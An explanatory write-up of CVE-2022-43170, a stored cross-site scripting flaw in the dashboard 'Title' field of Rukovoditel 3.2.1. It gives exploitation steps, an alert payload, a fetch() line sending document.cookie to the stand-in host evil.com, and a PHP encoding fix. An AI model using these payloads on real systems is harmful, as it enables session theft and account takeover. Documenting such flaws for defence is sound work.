CVE-2022-43170 - Stored XSS Vulnerability in Rukovoditel v3.2.1 Dashboard Configuration Explained

When managing projects with Rukovoditel, user dashboards often display critical business data. But, as security researchers discovered, an authenticated user could exploit a flaw and introduce malicious scripts into other users’ dashboards—especially dangerous in multi-user or enterprise contexts. In this article, we break down CVE-2022-43170, the underlying vulnerability, and show exactly how it can be abused, with simple code examples and links to original advisories.

What is Rukovoditel?

Rukovoditel is a popular open-source project management web app. Widely used for managing projects, tasks, and teams, it offers customizable dashboards so users can view key info at a glance.

The Vulnerability: Stored Cross-Site Scripting (XSS)

In version 3.2.1, the “Dashboard Configuration” feature (accessed via index.php?module=dashboard_configure/index) exposed a stored cross-site scripting (XSS) bug via the "Title" parameter.

How does it work?  
When a user clicks "Add info block" and sets a block Title, the app fails to sanitize HTML or JavaScript. Any script code entered is saved to the database and shown to all users’ dashboards. That allows attackers to inject persistent XSS.

1. Log in as a regular user

First, the attacker logs in with valid credentials (this is not an unauthenticated bug).

Go to

  http://<rukovoditel-host>/index.php?module=dashboard_configure/index
  

Instead of a normal title, enter a payload like

<script>alert('XSS by exploit');</script>

!Insert Payload

5. Impact

Whenever any user views their dashboard, the browser runs the attacker’s script in their context. An attacker could easily escalate this, for example, to steal cookies or session tokens:

<script>
  fetch('https://evil.com?cookie='; + document.cookie);
</script>

How to Fix

The application should properly sanitize and encode all user-provided input, especially when rendering data (like the Title field) to HTML.

Secure example (in PHP)

// Instead of echo-ing raw input:
echo $_POST['title'];

// Do this:
echo htmlspecialchars($_POST['title'], ENT_QUOTES, 'UTF-8');

Alternatively, use frameworks’ built-in protection features.

Responsible Disclosure and References

- NVD Entry for CVE-2022-43170
- huntr.dev Advisory (original reporter)
- Vendor Patch (Check for version 3.2.2+ fixes)

Conclusion

CVE-2022-43170 shows how even minor oversights, like skipping HTML encoding on text fields, can open the door to persistent, widespread attacks against all users of a system. If you run Rukovoditel, update immediately or apply robust input/output sanitization.

Pro tip: Regularly review app updates, audit user input points, and run XSS scanners to avoid falling victim to these classic but costly bugs.


*Stay safe, and keep your project management secure!*

External References

- Rukovoditel Official Website
- XSS Explained


*(If you found this helpful, share with your IT admin or developer!)*

Timeline

Published on: 10/28/2022 17:15:00 UTC
Last modified on: 11/01/2022 12:47:00 UTC